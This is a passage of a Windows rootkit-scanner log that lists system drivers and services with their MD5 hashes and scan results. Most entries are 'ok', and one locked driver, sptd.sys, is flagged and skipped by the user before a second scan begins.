13:27:13.0189 5964	RDPCDD (89e59be9a564262a3fb6c4f4f1cd9899) C:\Windows\system32\DRIVERS\RDPCDD.sys
13:27:13.0189 5964	RDPCDD - ok
13:27:13.0267 5964	rdpdr (e8bd98d46f2ed77132ba927fccb47d8b) C:\Windows\system32\drivers\rdpdr.sys
13:27:13.0267 5964	rdpdr - ok
13:27:13.0283 5964	RDPENCDD (9d91fe5286f748862ecffa05f8a0710c) C:\Windows\system32\drivers\rdpencdd.sys
13:27:13.0283 5964	RDPENCDD - ok
13:27:13.0345 5964	RDPWD (79c6df8477250f5c54f7c5ae1d6b814e) C:\Windows\system32\drivers\RDPWD.sys
13:27:13.0345 5964	RDPWD - ok
13:27:13.0423 5964	RemoteAccess (bcdd6b4804d06b1f7ebf29e53a57ece9) C:\Windows\System32\mprdim.dll
13:27:13.0423 5964	RemoteAccess - ok
13:27:13.0485 5964	RemoteRegistry (9e6894ea18daff37b63e1005f83ae4ab) C:\Windows\system32\regsvc.dll
13:27:13.0485 5964	RemoteRegistry - ok
13:27:13.0532 5964	RpcLocator (5123f83cbc4349d065534eeb6bbdc42b) C:\Windows\system32\locator.exe
13:27:13.0532 5964	RpcLocator - ok
13:27:13.0626 5964	RpcSs (3b5b4d53fec14f7476ca29a20cc31ac9) C:\Windows\system32\rpcss.dll
13:27:13.0626 5964	RpcSs - ok
13:27:13.0688 5964	rspndr (9c508f4074a39e8b4b31d27198146fad) C:\Windows\system32\DRIVERS\rspndr.sys
13:27:13.0688 5964	rspndr - ok
13:27:13.0735 5964	RTL8169 (5163f804256deb8cf1ef64b780a18caa) C:\Windows\system32\DRIVERS\Rtlh86.sys
13:27:13.0735 5964	RTL8169 - ok
13:27:13.0782 5964	SamSs (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:27:13.0782 5964	SamSs - ok
13:27:13.0829 5964	sbp2port (3ce8f073a557e172b330109436984e30) C:\Windows\system32\drivers\sbp2port.sys
13:27:13.0829 5964	sbp2port - ok
13:27:13.0922 5964	SCardSvr (77b7a11a0c3d78d3386398fbbea1b632) C:\Windows\System32\SCardSvr.dll
13:27:13.0938 5964	SCardSvr - ok
13:27:14.0031 5964	Schedule (1a58069db21d05eb2ab58ee5753ebe8d) C:\Windows\system32\schedsvc.dll
13:27:14.0250 5964	Schedule - ok
13:27:14.0468 5964	SCPolicySvc (312ec3e37a0a1f2006534913e37b4423) C:\Windows\System32\certprop.dll
13:27:14.0484 5964	SCPolicySvc - ok
13:27:14.0624 5964	sdbus (8f36b54688c31eed4580129040c6a3d3) C:\Windows\system32\DRIVERS\sdbus.sys
13:27:14.0640 5964	sdbus - ok
13:27:14.0687 5964	SDRSVC (716313d9f6b0529d03f726d5aaf6f191) C:\Windows\System32\SDRSVC.dll
13:27:14.0687 5964	SDRSVC - ok
13:27:14.0733 5964	secdrv (90a3935d05b494a5a39d37e71f09a677) C:\Windows\system32\drivers\secdrv.sys
13:27:14.0733 5964	secdrv - ok
13:27:14.0780 5964	seclogon (fd5199d4d8a521005e4b5ee7fe00fa9b) C:\Windows\system32\seclogon.dll
13:27:14.0780 5964	seclogon - ok
13:27:14.0811 5964	SENS (a9bbab5759771e523f55563d6cbe140f) C:\Windows\system32\sens.dll
13:27:14.0811 5964	SENS - ok
13:27:14.0827 5964	Serenum (68e44e331d46f0fb38f0863a84cd1a31) C:\Windows\system32\drivers\serenum.sys
13:27:14.0827 5964	Serenum - ok
13:27:14.0858 5964	Serial (c70d69a918b178d3c3b06339b40c2e1b) C:\Windows\system32\drivers\serial.sys
13:27:14.0889 5964	Serial - ok
13:27:14.0936 5964	sermouse (8af3d28a879bf75db53a0ee7a4289624) C:\Windows\system32\drivers\sermouse.sys
13:27:14.0936 5964	sermouse - ok
13:27:15.0233 5964	ServiceLayer (56eb980da71b94b79a341615c3c256cf) C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
13:27:15.0233 5964	ServiceLayer - ok
13:27:15.0311 5964	SessionEnv (d2193326f729b163125610dbf3e17d57) C:\Windows\system32\sessenv.dll
13:27:15.0311 5964	SessionEnv - ok
13:27:15.0373 5964	sffdisk (3efa810bdca87f6ecc24f9832243fe86) C:\Windows\system32\DRIVERS\sffdisk.sys
13:27:15.0373 5964	sffdisk - ok
13:27:15.0420 5964	sffp_mmc (8fd08a310645fe872eeec6e08c6bf3ee) C:\Windows\system32\drivers\sffp_mmc.sys
13:27:15.0420 5964	sffp_mmc - ok
13:27:15.0498 5964	sffp_sd (9f66a46c55d6f1ccabc79bb7afccc545) C:\Windows\system32\DRIVERS\sffp_sd.sys
13:27:15.0513 5964	sffp_sd - ok
13:27:15.0545 5964	sfloppy (46ed8e91793b2e6f848015445a0ac188) C:\Windows\system32\drivers\sfloppy.sys
13:27:15.0545 5964	sfloppy - ok
13:27:15.0825 5964	SharedAccess (e1499bd0ff76b1b2fbbf1af339d91165) C:\Windows\System32\ipnathlp.dll
13:27:15.0841 5964	SharedAccess - ok
13:27:15.0888 5964	ShellHWDetection (c7230fbee14437716701c15be02c27b8) C:\Windows\System32\shsvcs.dll
13:27:15.0888 5964	ShellHWDetection - ok
13:27:15.0935 5964	SI3132 (7d494c2000287595d87b9ff6b080d3ff) C:\Windows\system32\DRIVERS\SI3132.sys
13:27:15.0935 5964	SI3132 - ok
13:27:15.0966 5964	SiFilter (df978385397187ba5e5e1c9c56a80a1a) C:\Windows\system32\DRIVERS\SiWinAcc.sys
13:27:15.0966 5964	SiFilter - ok
13:27:16.0013 5964	simptcp (a275fbb7c99458c12e088dff3e58eb4d) C:\Windows\System32\tcpsvcs.exe
13:27:16.0013 5964	simptcp - ok
13:27:16.0044 5964	SiRemFil (aaab072321d75a366269a6d089f3d71e) C:\Windows\system32\DRIVERS\SiRemFil.sys
13:27:16.0044 5964	SiRemFil - ok
13:27:16.0059 5964	sisagp (d2a595d6eebeeaf4334f8e50efbc9931) C:\Windows\system32\drivers\sisagp.sys
13:27:16.0059 5964	sisagp - ok
13:27:16.0106 5964	SiSRaid2 (cedd6f4e7d84e9f98b34b3fe988373aa) C:\Windows\system32\drivers\sisraid2.sys
13:27:16.0106 5964	SiSRaid2 - ok
13:27:16.0122 5964	SiSRaid4 (df843c528c4f69d12ce41ce462e973a7) C:\Windows\system32\drivers\sisraid4.sys
13:27:16.0137 5964	SiSRaid4 - ok
13:27:17.0354 5964	slsvc (862bb4cbc05d80c5b45be430e5ef872f) C:\Windows\system32\SLsvc.exe
13:27:17.0510 5964	slsvc - ok
13:27:18.0243 5964	SLUINotify (6edc422215cd78aa8a9cde6b30abbd35) C:\Windows\system32\SLUINotify.dll
13:27:18.0259 5964	SLUINotify - ok
13:27:18.0368 5964	Smb (7b75299a4d201d6a6533603d6914ab04) C:\Windows\system32\DRIVERS\smb.sys
13:27:18.0368 5964	Smb - ok
13:27:18.0462 5964	SNMPTRAP (2a146a055b4401c16ee62d18b8e2a032) C:\Windows\System32\snmptrap.exe
13:27:18.0477 5964	SNMPTRAP - ok
13:27:18.0524 5964	spldr (7aebdeef071fe28b0eef2cdd69102bff) C:\Windows\system32\drivers\spldr.sys
13:27:18.0524 5964	spldr - ok
13:27:18.0883 5964	Spooler (8554097e5136c3bf9f69fe578a1b35f4) C:\Windows\System32\spoolsv.exe
13:27:18.0883 5964	Spooler - ok
13:27:18.0992 5964	sptd (7f1b7c4d446cd3f926af45b8c48bd593) C:\Windows\system32\Drivers\sptd.sys
13:27:18.0992 5964	Suspicious file (NoAccess): C:\Windows\system32\Drivers\sptd.sys. md5: 7f1b7c4d446cd3f926af45b8c48bd593
13:27:19.0008 5964	sptd ( LockedFile.Multi.Generic ) - warning
13:27:19.0008 5964	sptd - detected LockedFile.Multi.Generic (1)
13:27:19.0257 5964	srv (41987f9fc0e61adf54f581e15029ad91) C:\Windows\system32\DRIVERS\srv.sys
13:27:19.0273 5964	srv - ok
13:27:19.0335 5964	srv2 (ff33aff99564b1aa534f58868cbe41ef) C:\Windows\system32\DRIVERS\srv2.sys
13:27:19.0351 5964	srv2 - ok
13:27:19.0398 5964	srvnet (7605c0e1d01a08f3ecd743f38b834a44) C:\Windows\system32\DRIVERS\srvnet.sys
13:27:19.0398 5964	srvnet - ok
13:27:19.0757 5964	SSDPSRV (03d50b37234967433a5ea5ba72bc0b62) C:\Windows\System32\ssdpsrv.dll
13:27:19.0772 5964	SSDPSRV - ok
13:27:19.0866 5964	SstpSvc (6f1a32e7b7b30f004d9a20afadb14944) C:\Windows\system32\sstpsvc.dll
13:27:19.0866 5964	SstpSvc - ok
13:27:20.0053 5964	StarWindServiceAE (b1691af4a072cb674d600db16dd7308e) C:\Program Files\Alcohol Soft\Alcohol 52\StarWind\StarWindServiceAE.exe
13:27:20.0069 5964	StarWindServiceAE - ok
13:27:20.0147 5964	StillCam (ef70b3d22b4bffda6ea851ecb063efaa) C:\Windows\system32\DRIVERS\serscan.sys
13:27:20.0147 5964	StillCam - ok
13:27:20.0240 5964	stisvc (5de7d67e49b88f5f07f3e53c4b92a352) C:\Windows\System32\wiaservc.dll
13:27:20.0271 5964	stisvc - ok
13:27:20.0318 5964	swenum (7ba58ecf0c0a9a69d44b3dca62becf56) C:\Windows\system32\DRIVERS\swenum.sys
13:27:20.0318 5964	swenum - ok
13:27:20.0505 5964	swprv (f21fd248040681cca1fb6c9a03aaa93d) C:\Windows\System32\swprv.dll
13:27:20.0521 5964	swprv - ok
13:27:20.0646 5964	Swupdtmr (327786c5d6bcf284fab14c2b5751f514) c:\Toshiba\IVP\swupdate\swupdtmr.exe
13:27:20.0646 5964	Swupdtmr - ok
13:27:20.0708 5964	Symc8xx (192aa3ac01df071b541094f251deed10) C:\Windows\system32\drivers\symc8xx.sys
13:27:20.0708 5964	Symc8xx - ok
13:27:20.0724 5964	Sym_hi (8c8eb8c76736ebaf3b13b633b2e64125) C:\Windows\system32\drivers\sym_hi.sys
13:27:20.0739 5964	Sym_hi - ok
13:27:20.0755 5964	Sym_u3 (8072af52b5fd103bbba387a1e49f62cb) C:\Windows\system32\drivers\sym_u3.sys
13:27:20.0755 5964	Sym_u3 - ok
13:27:20.0817 5964	SynTP (5efcedcf3daf5c8d9e8b77a34a4eec99) C:\Windows\system32\DRIVERS\SynTP.sys
13:27:20.0817 5964	SynTP - ok
13:27:20.0911 5964	SysMain (9a51b04e9886aa4ee90093586b0ba88d) C:\Windows\system32\sysmain.dll
13:27:20.0942 5964	SysMain - ok
13:27:20.0958 5964	TabletInputService (2dca225eae15f42c0933e998ee0231c3) C:\Windows\System32\TabSvc.dll
13:27:20.0973 5964	TabletInputService - ok
13:27:21.0051 5964	TapiSrv (d7673e4b38ce21ee54c59eeeb65e2483) C:\Windows\System32\tapisrv.dll
13:27:21.0051 5964	TapiSrv - ok
13:27:21.0114 5964	TBS (cb05822cd9cc6c688168e113c603dbe7) C:\Windows\System32\tbssvc.dll
13:27:21.0114 5964	TBS - ok
13:27:21.0223 5964	Tcpip (ee7e10bed85c312c1d5d30c435bdda9f) C:\Windows\system32\drivers\tcpip.sys
13:27:21.0270 5964	Tcpip - ok
13:27:21.0285 5964	Tcpip6 (ee7e10bed85c312c1d5d30c435bdda9f) C:\Windows\system32\DRIVERS\tcpip.sys
13:27:21.0285 5964	Tcpip6 - ok
13:27:21.0317 5964	tcpipreg (2c2d4cff5e09c73908f9b5af49a51365) C:\Windows\system32\drivers\tcpipreg.sys
13:27:21.0317 5964	tcpipreg - ok
13:27:21.0379 5964	tdcmdpst (1825bceb47bf41c5a9f0e44de82fc27a) C:\Windows\system32\DRIVERS\tdcmdpst.sys
13:27:21.0379 5964	tdcmdpst - ok
13:27:21.0426 5964	TDPIPE (5dcf5e267be67a1ae926f2df77fbcc56) C:\Windows\system32\drivers\tdpipe.sys
13:27:21.0426 5964	TDPIPE - ok
13:27:21.0457 5964	TDTCP (389c63e32b3cefed425b61ed92d3f021) C:\Windows\system32\drivers\tdtcp.sys
13:27:21.0457 5964	TDTCP - ok
13:27:21.0473 5964	tdx (76b06eb8a01fc8624d699e7045303e54) C:\Windows\system32\DRIVERS\tdx.sys
13:27:21.0488 5964	tdx - ok
13:27:23.0017 5964	TeamViewer6 (fe559178000347d2ca1b7847f0379749) C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
13:27:23.0033 5964	TeamViewer6 - ok
13:27:23.0469 5964	TermDD (3cad38910468eab9a6479e2f01db43c7) C:\Windows\system32\DRIVERS\termdd.sys
13:27:23.0469 5964	TermDD - ok
13:27:23.0922 5964	TermService (bb95da09bef6e7a131bff3ba5032090d) C:\Windows\System32\termsrv.dll
13:27:23.0953 5964	TermService - ok
13:27:24.0062 5964	Themes (c7230fbee14437716701c15be02c27b8) C:\Windows\system32\shsvcs.dll
13:27:24.0062 5964	Themes - ok
13:27:24.0249 5964	THREADORDER (1076ffcffaae8385fd62dfcb25ac4708) C:\Windows\system32\mmcss.dll
13:27:24.0249 5964	THREADORDER - ok
13:27:24.0312 5964	tifm21 (28b7f973c36d157a7885b1ae42a4a2a9) C:\Windows\system32\drivers\tifm21.sys
13:27:24.0343 5964	tifm21 - ok
13:27:24.0686 5964	TNaviSrv (38e18dce385ff2ded57423a279559dbc) C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
13:27:24.0686 5964	TNaviSrv - ok
13:27:24.0795 5964	TODDSrv (d540858e65bfa6fded41ad2495ece344) C:\Windows\system32\TODDSrv.exe
13:27:24.0795 5964	TODDSrv - ok
13:27:25.0076 5964	TosCoSrv (6a54c28b53c6b50d333c8ee974c6b208) C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
13:27:25.0076 5964	TosCoSrv - ok
13:27:25.0092 5964	Tosrfcom - ok
13:27:25.0154 5964	tos_sps32 (1ea5f27c29405bf49799feca77186da9) C:\Windows\system32\DRIVERS\tos_sps32.sys
13:27:25.0170 5964	tos_sps32 - ok
13:27:25.0185 5964	TpChoice - ok
13:27:25.0279 5964	TrkWks (ec74e77d0eb004bd3a809b5f8fb8c2ce) C:\Windows\System32\trkwks.dll
13:27:25.0279 5964	TrkWks - ok
13:27:25.0373 5964	TrustedInstaller (97d9d6a04e3ad9b6c626b9931db78dba) C:\Windows\servicing\TrustedInstaller.exe
13:27:25.0373 5964	TrustedInstaller - ok
13:27:25.0435 5964	tssecsrv (dcf0f056a2e4f52287264f5ab29cf206) C:\Windows\system32\DRIVERS\tssecsrv.sys
13:27:25.0435 5964	tssecsrv - ok
13:27:25.0482 5964	tunmp (caecc0120ac49e3d2f758b9169872d38) C:\Windows\system32\DRIVERS\tunmp.sys
13:27:25.0482 5964	tunmp - ok
13:27:25.0544 5964	tunnel (300db877ac094feab0be7688c3454a9c) C:\Windows\system32\DRIVERS\tunnel.sys
13:27:25.0544 5964	tunnel - ok
13:27:25.0575 5964	TVALZ (792a8b80f8188aba4b2be271583f3e46) C:\Windows\system32\DRIVERS\TVALZ_O.SYS
13:27:25.0591 5964	TVALZ - ok
13:27:25.0622 5964	uagp35 (c3ade15414120033a36c0f293d4a4121) C:\Windows\system32\drivers\uagp35.sys
13:27:25.0638 5964	uagp35 - ok
13:27:25.0669 5964	udfs (d9728af68c4c7693cb100b8441cbdec6) C:\Windows\system32\DRIVERS\udfs.sys
13:27:25.0669 5964	udfs - ok
13:27:25.0716 5964	UI0Detect (ecef404f62863755951e09c802c94ad5) C:\Windows\system32\UI0Detect.exe
13:27:25.0731 5964	UI0Detect - ok
13:27:25.0825 5964	UleadBurningHelper (332d341d92b933600d41953b08360dfb) C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
13:27:25.0825 5964	UleadBurningHelper - ok
13:27:25.0856 5964	uliagpkx (75e6890ebfce0841d3291b02e7a8bdb0) C:\Windows\system32\drivers\uliagpkx.sys
13:27:25.0856 5964	uliagpkx - ok
13:27:25.0887 5964	uliahci (3cd4ea35a6221b85dcc25daa46313f8d) C:\Windows\system32\drivers\uliahci.sys
13:27:25.0903 5964	uliahci - ok
13:27:25.0919 5964	UlSata (8514d0e5cd0534467c5fc61be94a569f) C:\Windows\system32\drivers\ulsata.sys
13:27:25.0934 5964	UlSata - ok
13:27:25.0965 5964	ulsata2 (38c3c6e62b157a6bc46594fada45c62b) C:\Windows\system32\drivers\ulsata2.sys
13:27:25.0965 5964	ulsata2 - ok
13:27:26.0012 5964	umbus (32cff9f809ae9aed85464492bf3e32d2) C:\Windows\system32\DRIVERS\umbus.sys
13:27:26.0012 5964	umbus - ok
13:27:26.0075 5964	upnphost (68308183f4ae0be7bf8ecd07cb297999) C:\Windows\System32\upnphost.dll
13:27:26.0106 5964	upnphost - ok
13:27:26.0153 5964	USBAAPL (83cafcb53201bbac04d822f32438e244) C:\Windows\system32\Drivers\usbaapl.sys
13:27:26.0184 5964	USBAAPL - ok
13:27:26.0293 5964	usbaudio (32db9517628ff0d070682aab61e688f0) C:\Windows\system32\drivers\usbaudio.sys
13:27:26.0293 5964	usbaudio - ok
13:27:26.0355 5964	usbccgp (caf811ae4c147ffcd5b51750c7f09142) C:\Windows\system32\DRIVERS\usbccgp.sys
13:27:26.0355 5964	usbccgp - ok
13:27:26.0402 5964	usbcir (e9476e6c486e76bc4898074768fb7131) C:\Windows\system32\drivers\usbcir.sys
13:27:26.0402 5964	usbcir - ok
13:27:26.0449 5964	usbehci (79e96c23a97ce7b8f14d310da2db0c9b) C:\Windows\system32\DRIVERS\usbehci.sys
13:27:26.0465 5964	usbehci - ok
13:27:26.0496 5964	usbhub (4673bbcb006af60e7abddbe7a130ba42) C:\Windows\system32\DRIVERS\usbhub.sys
13:27:26.0511 5964	usbhub - ok
13:27:26.0574 5964	usbohci (ce697fee0d479290d89bec80dfe793b7) C:\Windows\system32\DRIVERS\usbohci.sys
13:27:26.0574 5964	usbohci - ok
13:27:26.0621 5964	usbprint (e75c4b5269091d15a2e7dc0b6d35f2f5) C:\Windows\system32\DRIVERS\usbprint.sys
13:27:26.0621 5964	usbprint - ok
13:27:26.0699 5964	usbscan (a508c9bd8724980512136b039bba65e9) C:\Windows\system32\DRIVERS\usbscan.sys
13:27:26.0714 5964	usbscan - ok
13:27:26.0777 5964	USBSTOR (be3da31c191bc222d9ad503c5224f2ad) C:\Windows\system32\DRIVERS\USBSTOR.SYS
13:27:26.0792 5964	USBSTOR - ok
13:27:26.0823 5964	usbuhci (325dbbacb8a36af9988ccf40eac228cc) C:\Windows\system32\DRIVERS\usbuhci.sys
13:27:26.0823 5964	usbuhci - ok
13:27:26.0870 5964	usbvideo (0a6b81f01bc86399482e27e6fda7b33b) C:\Windows\system32\Drivers\usbvideo.sys
13:27:26.0886 5964	usbvideo - ok
13:27:26.0917 5964	UVCFTR (5701a984efa8e209848a6d556dd02933) C:\Windows\system32\DRIVERS\UVCFTR_S.SYS
13:27:26.0917 5964	UVCFTR - ok
13:27:26.0964 5964	UxSms (1509e705f3ac1d474c92454a5c2dd81f) C:\Windows\System32\uxsms.dll
13:27:26.0979 5964	UxSms - ok
13:27:27.0323 5964	vds (cd88d1b7776dc17a119049742ec07eb4) C:\Windows\System32\vds.exe
13:27:27.0385 5964	vds - ok
13:27:27.0432 5964	vga (7d92be0028ecdedec74617009084b5ef) C:\Windows\system32\DRIVERS\vgapnp.sys
13:27:27.0432 5964	vga - ok
13:27:27.0479 5964	VgaSave (2e93ac0a1d8c79d019db6c51f036636c) C:\Windows\System32\drivers\vga.sys
13:27:27.0479 5964	VgaSave - ok
13:27:27.0494 5964	viaagp (045d9961e591cf0674a920b6ba3ba5cb) C:\Windows\system32\drivers\viaagp.sys
13:27:27.0510 5964	viaagp - ok
13:27:27.0525 5964	ViaC7 (56a4de5f02f2e88182b0981119b4dd98) C:\Windows\system32\drivers\viac7.sys
13:27:27.0525 5964	ViaC7 - ok
13:27:27.0557 5964	viaide (fd2e3175fcada350c7ab4521dca187ec) C:\Windows\system32\drivers\viaide.sys
13:27:27.0557 5964	viaide - ok
13:27:27.0697 5964	volmgr (69503668ac66c77c6cd7af86fbdf8c43) C:\Windows\system32\drivers\volmgr.sys
13:27:27.0697 5964	volmgr - ok
13:27:27.0791 5964	volmgrx (23e41b834759917bfd6b9a0d625d0c28) C:\Windows\system32\drivers\volmgrx.sys
13:27:27.0806 5964	volmgrx - ok
13:27:27.0853 5964	volsnap (147281c01fcb1df9252de2a10d5e7093) C:\Windows\system32\drivers\volsnap.sys
13:27:27.0853 5964	volsnap - ok
13:27:27.0931 5964	vsmraid (d984439746d42b30fc65a4c3546c6829) C:\Windows\system32\drivers\vsmraid.sys
13:27:27.0962 5964	vsmraid - ok
13:27:28.0415 5964	VSS (db3d19f850c6eb32bdcb9bc0836acddb) C:\Windows\system32\vssvc.exe
13:27:28.0493 5964	VSS - ok
13:27:28.0914 5964	W32Time (96ea68b9eb310a69c25ebb0282b2b9de) C:\Windows\system32\w32time.dll
13:27:28.0929 5964	W32Time - ok
13:27:29.0179 5964	W3SVC (9ca92191c8f18e8b491a5b28e63c07b7) C:\Windows\system32\inetsrv\iisw3adm.dll
13:27:29.0195 5964	W3SVC - ok
13:27:29.0366 5964	WacomPen (48dfee8f1af7c8235d4e626f0c4fe031) C:\Windows\system32\drivers\wacompen.sys
13:27:29.0366 5964	WacomPen - ok
13:27:29.0631 5964	Wanarp (55201897378cca7af8b5efd874374a26) C:\Windows\system32\DRIVERS\wanarp.sys
13:27:29.0631 5964	Wanarp - ok
13:27:29.0631 5964	Wanarpv6 (55201897378cca7af8b5efd874374a26) C:\Windows\system32\DRIVERS\wanarp.sys
13:27:29.0631 5964	Wanarpv6 - ok
13:27:29.0647 5964	WAS (9ca92191c8f18e8b491a5b28e63c07b7) C:\Windows\system32\inetsrv\iisw3adm.dll
13:27:29.0647 5964	WAS - ok
13:27:29.0803 5964	wcncsvc (a3cd60fd826381b49f03832590e069af) C:\Windows\System32\wcncsvc.dll
13:27:29.0819 5964	wcncsvc - ok
13:27:29.0865 5964	WcsPlugInService (11bcb7afcdd7aadacb5746f544d3a9c7) C:\Windows\System32\WcsPlugInService.dll
13:27:29.0881 5964	WcsPlugInService - ok
13:27:29.0912 5964	Wd (afc5ad65b991c1e205cf25cfdbf7a6f4) C:\Windows\system32\drivers\wd.sys
13:27:29.0912 5964	Wd - ok
13:27:30.0006 5964	Wdf01000 (b6f0a7ad6d4bd325fbcd8bac96cd8d96) C:\Windows\system32\drivers\Wdf01000.sys
13:27:30.0037 5964	Wdf01000 - ok
13:27:30.0115 5964	WdiServiceHost (abfc76b48bb6c96e3338d8943c5d93b5) C:\Windows\system32\wdi.dll
13:27:30.0115 5964	WdiServiceHost - ok
13:27:30.0115 5964	WdiSystemHost (abfc76b48bb6c96e3338d8943c5d93b5) C:\Windows\system32\wdi.dll
13:27:30.0131 5964	WdiSystemHost - ok
13:27:30.0224 5964	WebClient (04c37d8107320312fbae09926103d5e2) C:\Windows\System32\webclnt.dll
13:27:30.0240 5964	WebClient - ok
13:27:30.0380 5964	Wecsvc (ae3736e7e8892241c23e4ebbb7453b60) C:\Windows\system32\wecsvc.dll
13:27:30.0380 5964	Wecsvc - ok
13:27:30.0458 5964	wercplsupport (670ff720071ed741206d69bd995ea453) C:\Windows\System32\wercplsupport.dll
13:27:30.0474 5964	wercplsupport - ok
13:27:30.0536 5964	WerSvc (32b88481d3b326da6deb07b1d03481e7) C:\Windows\System32\WerSvc.dll
13:27:30.0552 5964	WerSvc - ok
13:27:30.0755 5964	WinDefend (4575aa12561c5648483403541d0d7f2b) C:\Program Files\Windows Defender\mpsvc.dll
13:27:30.0770 5964	WinDefend - ok
13:27:30.0770 5964	WinHttpAutoProxySvc - ok
13:27:30.0926 5964	Winmgmt (6b2a1d0e80110e3d04e6863c6e62fd8a) C:\Windows\system32\wbem\WMIsvc.dll
13:27:30.0926 5964	Winmgmt - ok
13:27:31.0113 5964	WinRM (7cfe68bdc065e55aa5e8421607037511) C:\Windows\system32\WsmSvc.dll
13:27:31.0176 5964	WinRM - ok
13:27:31.0457 5964	Wlansvc (c008405e4feeb069e30da1d823910234) C:\Windows\System32\wlansvc.dll
13:27:31.0503 5964	Wlansvc - ok
13:27:32.0486 5964	wlidsvc (0a70f4022ec2e14c159efc4f69aa2477) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
13:27:32.0595 5964	wlidsvc - ok
13:27:33.0547 5964	WmiAcpi (701a9f884a294327e9141d73746ee279) C:\Windows\system32\drivers\wmiacpi.sys
13:27:33.0547 5964	WmiAcpi - ok
13:27:33.0937 5964	wmiApSrv (43be3875207dcb62a85c8c49970b66cc) C:\Windows\system32\wbem\WmiApSrv.exe
13:27:33.0937 5964	wmiApSrv - ok
13:27:34.0374 5964	WMPNetworkSvc (3978704576a121a9204f8cc49a301a9b) C:\Program Files\Windows Media Player\wmpnetwk.exe
13:27:34.0452 5964	WMPNetworkSvc - ok
13:27:34.0514 5964	WPCSvc (cfc5a04558f5070cee3e3a7809f3ff52) C:\Windows\System32\wpcsvc.dll
13:27:34.0514 5964	WPCSvc - ok
13:27:34.0592 5964	WPDBusEnum (801fbdb89d472b3c467eb112a0fc9246) C:\Windows\system32\wpdbusenum.dll
13:27:34.0608 5964	WPDBusEnum - ok
13:27:35.0045 5964	WpdUsb (de9d36f91a4df3d911626643debf11ea) C:\Windows\system32\DRIVERS\wpdusb.sys
13:27:35.0341 5964	WpdUsb - ok
13:27:36.0261 5964	WPFFontCache_v0400 (dcf3e3edf5109ee8bc02fe6e1f045795) C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
13:27:36.0293 5964	WPFFontCache_v0400 - ok
13:27:36.0386 5964	ws2ifsl (e3a3cb253c0ec2494d4a61f5e43a389c) C:\Windows\system32\drivers\ws2ifsl.sys
13:27:36.0402 5964	ws2ifsl - ok
13:27:36.0449 5964	wscsvc (1ca6c40261ddc0425987980d0cd2aaab) C:\Windows\system32\wscsvc.dll
13:27:36.0480 5964	wscsvc - ok
13:27:36.0542 5964	WSDPrintDevice (4422ac5ed8d4c2f0db63e71d4c069dd7) C:\Windows\system32\DRIVERS\WSDPrint.sys
13:27:36.0542 5964	WSDPrintDevice - ok
13:27:36.0542 5964	WSearch - ok
13:27:37.0291 5964	wuauserv (6298277b73c77fa99106b271a7525163) C:\Windows\system32\wuaueng.dll
13:27:37.0400 5964	wuauserv - ok
13:27:38.0539 5964	WUDFRd (ac13cb789d93412106b0fb6c7eb2bcb6) C:\Windows\system32\DRIVERS\WUDFRd.sys
13:27:38.0539 5964	WUDFRd - ok
13:27:38.0586 5964	wudfsvc (575a4190d989f64732119e4114045a4f) C:\Windows\System32\WUDFSvc.dll
13:27:38.0586 5964	wudfsvc - ok
13:27:38.0913 5964	xnacc (9eea6d029fef5f3016d089b1a603837d) C:\Windows\system32\DRIVERS\xnacc.sys
13:27:38.0929 5964	xnacc - ok
13:27:38.0960 5964	MBR (0x1B8) (5b5e648d12fcadc244c1ec30318e1eb9) \Device\Harddisk0\DR0
13:27:39.0959 5964	\Device\Harddisk0\DR0 - ok
13:27:39.0990 5964	Boot (0x1200) (4c665477e7a79fdb1f3f319443854ef8) \Device\Harddisk0\DR0\Partition0
13:27:40.0083 5964	\Device\Harddisk0\DR0\Partition0 - ok
13:27:40.0083 5964	============================================================
13:27:40.0083 5964	Scan finished
13:27:40.0083 5964	============================================================
13:27:40.0099 4484	Detected object count: 1
13:27:40.0099 4484	Actual detected object count: 1
13:28:37.0667 4484	sptd ( LockedFile.Multi.Generic ) - skipped by user
13:28:37.0667 4484	sptd ( LockedFile.Multi.Generic ) - User select action: Skip 
13:29:01.0130 4240	============================================================
13:29:01.0130 4240	Scan started
13:29:01.0130 4240	Mode: Manual; SigCheck; TDLFS; 
13:29:01.0130 4240	============================================================
13:29:02.0495 4240	ACPI (82b296ae1892fe3dbee00c9cf92f8ac7) C:\Windows\system32\drivers\acpi.sys
13:29:02.0624 4240	ACPI - ok
13:29:02.0882 4240	AdobeFlashPlayerUpdateSvc (76d5a3d2a50402a0b9b6ed13c4371e79) C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
13:29:02.0903 4240	AdobeFlashPlayerUpdateSvc - ok
13:29:03.0092 4240	adp94xx (2edc5bbac6c651ece337bde8ed97c9fb) C:\Windows\system32\drivers\adp94xx.sys
13:29:03.0109 4240	adp94xx - ok
13:29:03.0200 4240	adpahci (b84088ca3cdca97da44a984c6ce1ccad) C:\Windows\system32\drivers\adpahci.sys
13:29:03.0220 4240	adpahci - ok
13:29:03.0386 4240	adpu160m (7880c67bccc27c86fd05aa2afb5ea469) C:\Windows\system32\drivers\adpu160m.sys
13:29:03.0403 4240	adpu160m - ok
13:29:03.0578 4240	adpu320 (9ae713f8e30efc2abccd84904333df4d) C:\Windows\system32\drivers\adpu320.sys
13:29:03.0596 4240	adpu320 - ok
13:29:03.0692 4240	AeLookupSvc (9d1fda9e086ba64e3c93c9de32461bcf) C:\Windows\System32\aelupsvc.dll
13:29:03.0826 4240	AeLookupSvc - ok
13:29:03.0898 4240	AFD (3911b972b55fea0478476b2e777b29fa) C:\Windows\system32\drivers\afd.sys
13:29:03.0940 4240	AFD - ok
13:29:03.0960 4240	AgereModemAudio (39e435c90c9c4f780fa0ed05ca3c3a1b) C:\Windows\system32\agrsmsvc.exe
13:29:03.0996 4240	AgereModemAudio - ok
13:29:04.0091 4240	AgereSoftModem (ce91b158fa490cf4c4d487a4130f4660) C:\Windows\system32\DRIVERS\AGRSM.sys
13:29:04.0158 4240	AgereSoftModem - ok
13:29:04.0208 4240	agp440 (ef23439cdd587f64c2c1b8825cead7d8) C:\Windows\system32\drivers\agp440.sys
13:29:04.0223 4240	agp440 - ok
